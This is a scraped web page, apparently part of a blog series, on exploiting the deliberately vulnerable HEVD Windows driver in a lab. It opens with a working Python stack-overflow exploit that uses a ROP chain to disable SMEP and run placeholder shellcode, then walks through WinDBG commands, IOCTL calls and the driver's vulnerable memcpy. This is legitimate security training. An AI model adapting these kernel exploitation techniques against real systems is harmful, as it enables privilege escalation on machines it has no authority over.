byref(c_ulong())):\\n print('Failed to get kernel base address.')\\n sys.exit(1)\\n return base[0]\\n\\n\\nBASE_ADDRESS = get_kernel_base()\\nprint(f'Obtained kernel base address: {hex(BASE_ADDRESS)}')\\n\\nSHELLCODE = (\\n b'\\\\xb8\\\\xef\\\\xbe\\\\xad\\\\xde' + # mov eax,0xdeadbeef\\n b'\\\\xcc' # INT3 -> software breakpoint\\n)\\n\\nRET_PTR = KERNEL32.VirtualAlloc(\\n    c_int(0),                    # lpAddress\\n    c_int(len(SHELLCODE)),       # dwSize\\n    c_int(0x3000),               # flAllocationType = MEM_COMMIT | MEM_RESERVE\\n    c_int(0x40)                  # flProtect = PAGE_EXECUTE_READWRITE\\n)\\n\\nKERNEL32.RtlMoveMemory(\\n    c_int(RET_PTR),              # Destination\\n    SHELLCODE,                   # Source\\n    c_int(len(SHELLCODE))        # Length\\n)\\n\\nROP_CHAIN = (\\n    struct.pack('<L', BASE_ADDRESS + 0x0002bbef) +     #  pop eax # ret\\n    struct.pack('<L', 0x42424242) +                    #  Padding for ret 8\\n    struct.pack('<L', 0x42424242) +                    #\\n    struct.pack('<L', 0x000406e9) +                    #  Value to disable SMEP\\n    struct.pack('<L', BASE_ADDRESS + 0x0011f8de) +     #  mov cr4, eax # ret\\n    struct.pack('<L', RET_PTR)                         #  Pointer to shellcode\\n)\\n\\nPAYLOAD = (\\n    b'A' * 2080 +\\n    ROP_CHAIN\\n)\\n\\nSIZE = len(PAYLOAD)\\n\\nHANDLE = DeviceIoControl(DEVICE_NAME)\\nHANDLE.ioctl(IOCTL_HEVD_STACK_OVERFLOW, PAYLOAD, SIZE, 0, 0)\",language:\"Python\"})})}),/*#__PURE__*/e(\"p\",{children:\"Looks good. Now check it:\"}),/*#__PURE__*/e(\"img\",{alt:\"Python exploit success\",className:\"framer-image\",height:\"448\",src:\"https://framerusercontent.com/images/0NLOw2Kgih9Eg6Le2KZIEiclxSg.gif\",srcSet:\"https://framerusercontent.com/images/0NLOw2Kgih9Eg6Le2KZIEiclxSg.gif 841w\",style:{aspectRatio:\"841 / 896\"},width:\"420\"}),/*#__PURE__*/t(\"p\",{children:[\"And this is the content of the \",/*#__PURE__*/e(\"code\",{children:\"CR4\"}),\" register:\"]}),/*#__PURE__*/e(\"img\",{alt:\"CR4 register content\",className:\"framer-image\",height:\"106\",src:\"https://framerusercontent.com/images/RhtIeYKFnE8YTyqkuPTdBarZpAg.png\",srcSet:\"https://framerusercontent.com/images/RhtIeYKFnE8YTyqkuPTdBarZpAg.png?scale-down-to=512 512w,https://framerusercontent.com/images/RhtIeYKFnE8YTyqkuPTdBarZpAg.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/RhtIeYKFnE8YTyqkuPTdBarZpAg.png 1920w\",style:{aspectRatio:\"1920 / 212\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"As you can see, we were able to disable \",/*#__PURE__*/e(\"code\",{children:\"SMEP\"}),\" and made \",/*#__PURE__*/e(\"code\",{children:\"EAX = 0xdeadbeef\"}),\"!\"]}),/*#__PURE__*/e(\"h2\",{children:\"Conclusions\"}),/*#__PURE__*/t(\"p\",{children:[\"In this post, we were able to execute a shellcode which made \",/*#__PURE__*/e(\"code\",{children:\"EAX = 0xdeadbeef\"}),\". We also bypassed \",/*#__PURE__*/e(\"code\",{children:\"SMEP\"}),\" protection using a \",/*#__PURE__*/e(\"code\",{children:\"kROP\"}),\" chain and defeated \",/*#__PURE__*/e(\"code\",{children:\"kASLR\"}),\" by leaking the kernel base address from \",/*#__PURE__*/e(\"code\",{children:\"ring-3\"}),\". However, we have still have to get a privileged shell on this system, which will be covered in the \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/hevd-privilege-escalation/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"next article\"})}),\".\"]})]});export const richText3=/*#__PURE__*/t(i.Fragment,{children:[/*#__PURE__*/t(\"p\",{children:[\"In the last \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/windows-kernel-debugging/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"post\"})}),\", we were able to set up a lab environment to start exploiting vulnerabilities in the Windows kernel space.\"]}),/*#__PURE__*/t(\"p\",{children:[\"This article will focus on the first steps to exploit the vulnerabilities on HackSys Extreme Vulnerable Driver (\",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\").\"]}),/*#__PURE__*/t(\"p\",{children:[\"First, we need to get familiar with \",/*#__PURE__*/e(\"code\",{children:\"WinDBG\"}),\", a very powerful debugger from Microsoft with a steep learning curve. We\u2019ll also use \",/*#__PURE__*/e(\"code\",{children:\"IDA\"}),\", specifically the freeware version, which is enough for most of what we\u2019re going to face.\"]}),/*#__PURE__*/t(\"p\",{children:[\"In the end, we\u2019re going to be able to crash our Windows 10 OS by leveraging a vulnerability on \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\". It's nice \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/red-team-exercise/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"to crash things\"})}),\" for the sake of science.\"]}),/*#__PURE__*/e(\"p\",{children:\"Let\u2019s get our hands dirty!\"})]});export const richText4=/*#__PURE__*/t(i.Fragment,{children:[/*#__PURE__*/e(\"h2\",{children:\"WinDBG 101\"}),/*#__PURE__*/t(\"p\",{children:[\"Before dealing with the exploitation process, I will list some \",/*#__PURE__*/e(\"code\",{children:\"WinDBG\"}),\" commands that have helped me. This is selfishly written as a reference for myself but kindly shared with you.\"]}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"g\"}),\": Short for \",/*#__PURE__*/e(\"code\",{children:\"Go\"}),\". It will resume the execution of the debugged.\"]})})}),/*#__PURE__*/e(\"img\",{alt:\"g for go\",className:\"framer-image\",height:\"213\",src:\"https://framerusercontent.com/images/oWXReq9V20OxsWHkuDpHW8VWSk.png\",srcSet:\"https://framerusercontent.com/images/oWXReq9V20OxsWHkuDpHW8VWSk.png?scale-down-to=512 512w,https://framerusercontent.com/images/oWXReq9V20OxsWHkuDpHW8VWSk.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/oWXReq9V20OxsWHkuDpHW8VWSk.png 1920w\",style:{aspectRatio:\"1920 / 426\"},width:\"960\"}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"t\"}),\": Short for \",/*#__PURE__*/e(\"code\",{children:\"Step Into\"}),\". It will execute the next instruction. If it\u2019s a \",/*#__PURE__*/e(\"code\",{children:\"call\"}),\", it will jump into the call content.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"p\"}),\": Sort for \",/*#__PURE__*/e(\"code\",{children:\"Step Over\"}),\". It will execute the next instruction. If it\u2019s a \",/*#__PURE__*/e(\"code\",{children:\"call\"}),\", it will execute whatever the call does and jump over it.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"gu\"}),\": Short for \",/*#__PURE__*/e(\"code\",{children:\"Step Out\"}),\". Will resume the execution until a \",/*#__PURE__*/e(\"code\",{children:\"ret\"}),\" instruction is found. Useful when you \",/*#__PURE__*/e(\"code\",{children:\"Step Into\"}),\" a function and want to return to the place it was called.\"]})})]}),/*#__PURE__*/e(\"img\",{alt:\"t, p, and gu\",className:\"framer-image\",height:\"331\",src:\"https://framerusercontent.com/images/JkAHHX7M1QXNuG4CoGVVBE1yZ2o.png\",srcSet:\"https://framerusercontent.com/images/JkAHHX7M1QXNuG4CoGVVBE1yZ2o.png?scale-down-to=512 512w,https://framerusercontent.com/images/JkAHHX7M1QXNuG4CoGVVBE1yZ2o.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/JkAHHX7M1QXNuG4CoGVVBE1yZ2o.png 1920w\",style:{aspectRatio:\"1920 / 662\"},width:\"960\"}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"d*\"}),\" family: Short for \",/*#__PURE__*/e(\"code\",{children:\"Display Memory\"}),\". It will dump the contents of a given memory address. The most useful variation on 32 bits debugging is \",/*#__PURE__*/e(\"code\",{children:\"dc\"}),\" (dump double-word and ASCII chars).\"]})})}),/*#__PURE__*/e(\"img\",{alt:\"dc\",className:\"framer-image\",height:\"373\",src:\"https://framerusercontent.com/images/Mxksc4OGQ66v6jiReqQRFeREa5U.png\",srcSet:\"https://framerusercontent.com/images/Mxksc4OGQ66v6jiReqQRFeREa5U.png?scale-down-to=512 512w,https://framerusercontent.com/images/Mxksc4OGQ66v6jiReqQRFeREa5U.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/Mxksc4OGQ66v6jiReqQRFeREa5U.png 1920w\",style:{aspectRatio:\"1920 / 746\"},width:\"960\"}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"lm\"}),\": Short for \",/*#__PURE__*/e(\"code\",{children:\"List Loaded Modules\"}),\". You can filter the output using \",/*#__PURE__*/e(\"code\",{children:\"lm m <module>\"}),\".\"]})})}),/*#__PURE__*/e(\"img\",{alt:\"lm\",className:\"framer-image\",height:\"456\",src:\"https://framerusercontent.com/images/6HrOfDaC8YcD42CZr6EEXc8NI.png\",srcSet:\"https://framerusercontent.com/images/6HrOfDaC8YcD42CZr6EEXc8NI.png?scale-down-to=512 512w,https://framerusercontent.com/images/6HrOfDaC8YcD42CZr6EEXc8NI.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/6HrOfDaC8YcD42CZr6EEXc8NI.png 1920w\",style:{aspectRatio:\"1920 / 912\"},width:\"960\"}),/*#__PURE__*/e(\"img\",{alt:\"lm m HE*\",className:\"framer-image\",height:\"121\",src:\"https://framerusercontent.com/images/V93a1LEV9rAPPcmbgM46rU6nrc.png\",srcSet:\"https://framerusercontent.com/images/V93a1LEV9rAPPcmbgM46rU6nrc.png?scale-down-to=512 512w,https://framerusercontent.com/images/V93a1LEV9rAPPcmbgM46rU6nrc.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/V93a1LEV9rAPPcmbgM46rU6nrc.png 1920w\",style:{aspectRatio:\"1920 / 242\"},width:\"960\"}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"dt\"}),\": Short for \",/*#__PURE__*/e(\"code\",{children:\"Display Type\"}),\". It is used to list data structures.\"]})})}),/*#__PURE__*/e(\"img\",{alt:\"dt\",className:\"framer-image\",height:\"460\",src:\"https://framerusercontent.com/images/d5QxxPOYSE5F7MgwS7Lc3kdxuY.png\",srcSet:\"https://framerusercontent.com/images/d5QxxPOYSE5F7MgwS7Lc3kdxuY.png?scale-down-to=512 512w,https://framerusercontent.com/images/d5QxxPOYSE5F7MgwS7Lc3kdxuY.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/d5QxxPOYSE5F7MgwS7Lc3kdxuY.png 1920w\",style:{aspectRatio:\"1920 / 920\"},width:\"960\"}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"r\"}),\": Short for \",/*#__PURE__*/e(\"code\",{children:\"Registers\"}),\". It will show the value of all the processor registers and flags. It\u2019s also used to change the value of a register.\"]})})}),/*#__PURE__*/e(\"img\",{alt:\"r\",className:\"framer-image\",height:\"400\",src:\"https://framerusercontent.com/images/OGcEwPeu4NJkSvdrwh4CL41AWU.png\",srcSet:\"https://framerusercontent.com/images/OGcEwPeu4NJkSvdrwh4CL41AWU.png?scale-down-to=512 512w,https://framerusercontent.com/images/OGcEwPeu4NJkSvdrwh4CL41AWU.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/OGcEwPeu4NJkSvdrwh4CL41AWU.png 1920w\",style:{aspectRatio:\"1920 / 800\"},width:\"960\"}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"u\"}),\": Short for \",/*#__PURE__*/e(\"code\",{children:\"Unassemble\"}),\". It will show the instructions at the given memory address.\"]})})}),/*#__PURE__*/e(\"img\",{alt:\"u\",className:\"framer-image\",height:\"367\",src:\"https://framerusercontent.com/images/mVoAF1gzVeibXdklzo6wuf7TaQw.png\",srcSet:\"https://framerusercontent.com/images/mVoAF1gzVeibXdklzo6wuf7TaQw.png?scale-down-to=512 512w,https://framerusercontent.com/images/mVoAF1gzVeibXdklzo6wuf7TaQw.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/mVoAF1gzVeibXdklzo6wuf7TaQw.png 1920w\",style:{aspectRatio:\"1920 / 734\"},width:\"960\"}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"x\"}),\": Short for \",/*#__PURE__*/e(\"code\",{children:\"Examine Symbols\"}),\". It will show the symbols at a given module.\"]})})}),/*#__PURE__*/e(\"img\",{alt:\"x\",className:\"framer-image\",height:\"331\",src:\"https://framerusercontent.com/images/b0F2kwFWNAFGjMKC8pZBFufMqE.png\",srcSet:\"https://framerusercontent.com/images/b0F2kwFWNAFGjMKC8pZBFufMqE.png?scale-down-to=512 512w,https://framerusercontent.com/images/b0F2kwFWNAFGjMKC8pZBFufMqE.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/b0F2kwFWNAFGjMKC8pZBFufMqE.png 1919w\",style:{aspectRatio:\"1919 / 663\"},width:\"959\"}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"e*\"}),\" family: Short for \",/*#__PURE__*/e(\"code\",{children:\"Enter Values\"}),\". It will enter a given value to a specified memory location. The most used variation on 32 bits debugging is \",/*#__PURE__*/e(\"code\",{children:\"ed\"}),\" (enter double-word value).\"]})})}),/*#__PURE__*/e(\"img\",{alt:\"ed\",className:\"framer-image\",height:\"229\",src:\"https://framerusercontent.com/images/EMi49Lk6FwZI6PW72egGMrlTJY.png\",srcSet:\"https://framerusercontent.com/images/EMi49Lk6FwZI6PW72egGMrlTJY.png?scale-down-to=512 512w,https://framerusercontent.com/images/EMi49Lk6FwZI6PW72egGMrlTJY.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/EMi49Lk6FwZI6PW72egGMrlTJY.png 1920w\",style:{aspectRatio:\"1920 / 458\"},width:\"960\"}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"?\"}),\": Evaluate expression.\"]})})}),/*#__PURE__*/e(\"img\",{alt:\"?\",className:\"framer-image\",height:\"78\",src:\"https://framerusercontent.com/images/Dnp2Gnq1Ia5OADf4sF37330S0yU.png\",srcSet:\"https://framerusercontent.com/images/Dnp2Gnq1Ia5OADf4sF37330S0yU.png?scale-down-to=512 512w,https://framerusercontent.com/images/Dnp2Gnq1Ia5OADf4sF37330S0yU.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/Dnp2Gnq1Ia5OADf4sF37330S0yU.png 1920w\",style:{aspectRatio:\"1920 / 156\"},width:\"960\"}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"bp\"}),\": Short for \",/*#__PURE__*/e(\"code\",{children:\"Breakpoint\"}),\". It will set a software breakpoint at a given address.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"bl\"}),\": Short for \",/*#__PURE__*/e(\"code\",{children:\"List Breakpoints\"}),\". It will list current breakpoints.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"bc\"}),\": Short for \",/*#__PURE__*/e(\"code\",{children:\"Clear Breakpoint\"}),\". It will remove breakpoints.\"]})})]}),/*#__PURE__*/e(\"img\",{alt:\"bp, bl, and bc\",className:\"framer-image\",height:\"379\",src:\"https://framerusercontent.com/images/kBNBGaNSF0SSJqZCCcHBSX4I6Ck.png\",srcSet:\"https://framerusercontent.com/images/kBNBGaNSF0SSJqZCCcHBSX4I6Ck.png?scale-down-to=512 512w,https://framerusercontent.com/images/kBNBGaNSF0SSJqZCCcHBSX4I6Ck.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/kBNBGaNSF0SSJqZCCcHBSX4I6Ck.png 1920w\",style:{aspectRatio:\"1920 / 758\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"This is by no means a comprehensive \",/*#__PURE__*/e(\"code\",{children:\"WinDBG\"}),\" reference but will show the commands I use the most when debugging.\"]}),/*#__PURE__*/e(\"h2\",{children:\"Talking to Windows drivers\"}),/*#__PURE__*/e(\"p\",{children:\"The common main goal of Windows Kernel exploitation is to elevate privileges to perform any desired task on the affected computer with the most powerful permissions. We do that by finding a vulnerability in a piece of code running at kernel-space and establishing a communication between the exploit in user-mode and the target in kernel-mode, which is where the drivers live.\"}),/*#__PURE__*/t(\"p\",{children:[\"As Windows runs in protected mode, user-land instructions cannot access to kernel-space memory. However, there is an interface provided by the OS that allows talking to drivers: \",/*#__PURE__*/e(\"code\",{children:\"IOCTL\"}),\" calls.\"]}),/*#__PURE__*/t(\"p\",{children:[\"When a driver is installed, it sets a device name using the \",/*#__PURE__*/e(\"code\",{children:\"IoCreateDevice\"}),\" call.\"]}),/*#__PURE__*/e(\"img\",{alt:\"IoCreateDevice\",className:\"framer-image\",height:\"490\",src:\"https://framerusercontent.com/images/ZYD6cSqCX8pC9BvKtJWQVcYN3U.png\",srcSet:\"https://framerusercontent.com/images/ZYD6cSqCX8pC9BvKtJWQVcYN3U.png?scale-down-to=512 512w,https://framerusercontent.com/images/ZYD6cSqCX8pC9BvKtJWQVcYN3U.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/ZYD6cSqCX8pC9BvKtJWQVcYN3U.png 1920w\",style:{aspectRatio:\"1920 / 980\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"It then defines the routines that will expose. Commonly, those routines are basically functions that will interact with other layers of the OS (Hardware Abstraction Layer or \",/*#__PURE__*/e(\"code\",{children:\"HAL\"}),\", for example) to manipulate a hardware device. In \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\", those routines are functions happening at kernel-level with several vulnerabilities.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Each routine is identified by an \",/*#__PURE__*/e(\"code\",{children:\"IOCTL\"}),\" (I/O control) code.\"]}),/*#__PURE__*/t(\"p\",{children:[\"The driver will accept calls to that routines using \",/*#__PURE__*/e(\"code\",{children:\"IRP\"}),\" (I/O Request Packets) structures and will set a handler that will dispatch the specific routine, given a specific \",/*#__PURE__*/e(\"code\",{children:\"IOCTL\"}),\" code:\"]}),/*#__PURE__*/e(\"img\",{alt:\"IOCTL code\",className:\"framer-image\",height:\"201\",src:\"https://framerusercontent.com/images/ZRfuFFflz43CrQzFjzbRBXSqcs.png\",srcSet:\"https://framerusercontent.com/images/ZRfuFFflz43CrQzFjzbRBXSqcs.png?scale-down-to=512 512w,https://framerusercontent.com/images/ZRfuFFflz43CrQzFjzbRBXSqcs.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/ZRfuFFflz43CrQzFjzbRBXSqcs.png 1920w\",style:{aspectRatio:\"1920 / 402\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"The \",/*#__PURE__*/e(\"code\",{children:\"IrpDeviceIoCtlHandler\"}),\" function in \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\" creates a jump table (like a \",/*#__PURE__*/e(\"code\",{children:\"switch\"}),\" statement) for each managed \",/*#__PURE__*/e(\"code\",{children:\"IOCTL\"}),\" code:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Jump table\",className:\"framer-image\",height:\"540\",src:\"https://framerusercontent.com/images/SdVcuhoLng3SK1M18fIK0Ze7OGI.png\",srcSet:\"https://framerusercontent.com/images/SdVcuhoLng3SK1M18fIK0Ze7OGI.png?scale-down-to=512 512w,https://framerusercontent.com/images/SdVcuhoLng3SK1M18fIK0Ze7OGI.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/SdVcuhoLng3SK1M18fIK0Ze7OGI.png 1920w\",style:{aspectRatio:\"1920 / 1080\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"In \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\", each \",/*#__PURE__*/e(\"code\",{children:\"case\"}),\" of that \",/*#__PURE__*/e(\"code\",{children:\"switch\"}),\" statement is handled by another function that will trigger a specific vulnerable function:\"]}),/*#__PURE__*/e(\"img\",{alt:\"vulnerable function\",className:\"framer-image\",height:\"243\",src:\"https://framerusercontent.com/images/SWZ3VBSopQ2buMfSs75KPzm7I.png\",srcSet:\"https://framerusercontent.com/images/SWZ3VBSopQ2buMfSs75KPzm7I.png?scale-down-to=512 512w,https://framerusercontent.com/images/SWZ3VBSopQ2buMfSs75KPzm7I.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/SWZ3VBSopQ2buMfSs75KPzm7I.png 1881w\",style:{aspectRatio:\"1881 / 486\"},width:\"940\"}),/*#__PURE__*/t(\"p\",{children:[\"Now, if we want to talk to that driver, we must get a handle on the driver\u2019s device name, which is \",/*#__PURE__*/e(\"code\",{children:\"HackSysExtremeVulnerableDrive\"}),\" in the case of \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\", and use the \",/*#__PURE__*/e(\"code\",{children:\"DeviceIoControl\"}),\" function to send the \",/*#__PURE__*/e(\"code\",{children:\"IOCTL\"}),\" code we want, along with the payload.\"]}),/*#__PURE__*/t(\"p\",{children:[\"In Python, there\u2019s a third-party package called \",/*#__PURE__*/e(\"code\",{children:\"infi.wioctl\"}),\" that wraps those calls nicely:\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"from infi.wioctl import DeviceIoControl\\n\\nHANDLE = DeviceIoControl(DEVICE_NAME)\\nHANDLE.ioctl(IOCTL_CODE, PAYLOAD, SIZE, 0, 0)\",language:\"Python\"})})}),/*#__PURE__*/t(\"p\",{children:[\"With that, we can start looking for our first vulnerability on \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\".\"]}),/*#__PURE__*/e(\"h2\",{children:\"HEVD stack overflow\"}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\" has several vulnerabilities built-in. In this post, we will discover the most basic, a stack overflow.\"]}),/*#__PURE__*/t(\"p\",{children:[\"When we look at the jump table generated by the \",/*#__PURE__*/e(\"code\",{children:\"IrpDeviceIoCtlHandler\"}),\" function, the first case is this:\"]}),/*#__PURE__*/e(\"img\",{alt:\"First case\",className:\"framer-image\",height:\"333\",src:\"https://framerusercontent.com/images/42HoaoZo3HeaqMLQTtJChBr7PlA.png\",srcSet:\"https://framerusercontent.com/images/42HoaoZo3HeaqMLQTtJChBr7PlA.png?scale-down-to=512 512w,https://framerusercontent.com/images/42HoaoZo3HeaqMLQTtJChBr7PlA.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/42HoaoZo3HeaqMLQTtJChBr7PlA.png 1920w\",style:{aspectRatio:\"1920 / 666\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"It is triggered when the \",/*#__PURE__*/e(\"code\",{children:\"IOCTL\"}),\" code is \",/*#__PURE__*/e(\"code\",{children:\"2236419\"}),\" decimal or \",/*#__PURE__*/e(\"code\",{children:\"0x222003\"}),\" in hex. Here, a call to \",/*#__PURE__*/e(\"code\",{children:\"BufferOverflowStackIoctlHandler\"}),\" is performed.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Inside \",/*#__PURE__*/e(\"code\",{children:\"BufferOverflowStackIoctlHandler\"}),\", there is a check verifying if the \",/*#__PURE__*/e(\"code\",{children:\"IRP\"}),\" package contains user-supplied data. If it does, a call to \",/*#__PURE__*/e(\"code\",{children:\"TriggerBufferOverflowStack\"}),\" is performed:\"]}),/*#__PURE__*/e(\"img\",{alt:\"BufferOverflowStackIoctlHandler\",className:\"framer-image\",height:\"540\",src:\"https://framerusercontent.com/images/K5GueR27WYcnGigvmfFJMcCbo.png\",srcSet:\"https://framerusercontent.com/images/K5GueR27WYcnGigvmfFJMcCbo.png?scale-down-to=512 512w,https://framerusercontent.com/images/K5GueR27WYcnGigvmfFJMcCbo.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/K5GueR27WYcnGigvmfFJMcCbo.png 1920w\",style:{aspectRatio:\"1920 / 1080\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"You can also note that the pointer to the user data is placed on \",/*#__PURE__*/e(\"code\",{children:\"EDX\"}),\" and the pointer to the size of the user data is placed on \",/*#__PURE__*/e(\"code\",{children:\"EAX\"}),\". That information is then pushed to the stack as the parameters for \",/*#__PURE__*/e(\"code\",{children:\"TriggerBufferOverflowStack\"}),\". You can see the same in the source code of \",/*#__PURE__*/e(\"code\",{children:\"HEVD\"}),\":\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"NTSTATUS\\nBufferOverflowStackIoctlHandler(\\n _In_ PIRP Irp,\\n _In_ PIO_STACK_LOCATION IrpSp\\n)\\n{\\n SIZE_T Size = 0;\\n PVOID UserBuffer = NULL;\\n NTSTATUS Status = STATUS_UNSUCCESSFUL;\\n\\n UNREFERENCED_PARAMETER(Irp);\\n PAGED_CODE();\\n\\n UserBuffer = IrpSp->Parameters.DeviceIoControl.Type3InputBuffer;\\n Size = IrpSp->Parameters.DeviceIoControl.InputBufferLength;\\n\\n    if (UserBuffer)\\n    {\\n        Status = TriggerBufferOverflowStack(UserBuffer, Size);\\n    }\\n\\n    return Status;\\n}\",language:\"C++\"})})}),/*#__PURE__*/t(\"p\",{children:[\"In the \",/*#__PURE__*/e(\"code\",{children:\"TriggerBufferOverflowStack\"}),\" function, the first important thing to notice is that a \",/*#__PURE__*/e(\"code\",{children:\"memset(&KernelBuffer, 0, 800h)\"}),\" call is done:\"]}),/*#__PURE__*/e(\"img\",{alt:\"TriggerBufferOverflowStack\",className:\"framer-image\",height:\"540\",src:\"https://framerusercontent.com/images/KcXae8mJBeYlDBX3npk5Yk4o4Y.png\",srcSet:\"https://framerusercontent.com/images/KcXae8mJBeYlDBX3npk5Yk4o4Y.png?scale-down-to=512 512w,https://framerusercontent.com/images/KcXae8mJBeYlDBX3npk5Yk4o4Y.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/KcXae8mJBeYlDBX3npk5Yk4o4Y.png 1920w\",style:{aspectRatio:\"1920 / 1080\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"This indicates that the buffer is \",/*#__PURE__*/e(\"code\",{children:\"800h\"}),\" or \",/*#__PURE__*/e(\"code\",{children:\"2048\"}),\" bytes long.\"]}),/*#__PURE__*/t(\"p\",{children:[\"In the end of \",/*#__PURE__*/e(\"code\",{children:\"TriggerBufferOverflowStack\"}),\", a call to \",/*#__PURE__*/e(\"code\",{children:\"memcpy(&KernelBuffer, &UserBuffer, SizeOfUserBuffer)\"}),\" is performed, which is a classic example of buffer overflow because we control both the \",/*#__PURE__*/e(\"code\",{children:\"UserBuffer\"}),\" data and the \",/*#__PURE__*/e(\"code\",{children:\"SizeOfUserBuffer\"}),\" value:\"]}),/*#__PURE__*/e(\"img\",{alt:\"buffer overflow\",className:\"framer-image\",height:\"136\",src:\"https://framerusercontent.com/images/inoGYdFMRm0NQGlleIwBg1qXqw.png\",srcSet:\"https://framerusercontent.com/images/inoGYdFMRm0NQGlleIwBg1qXqw.png?scale-down-to=512 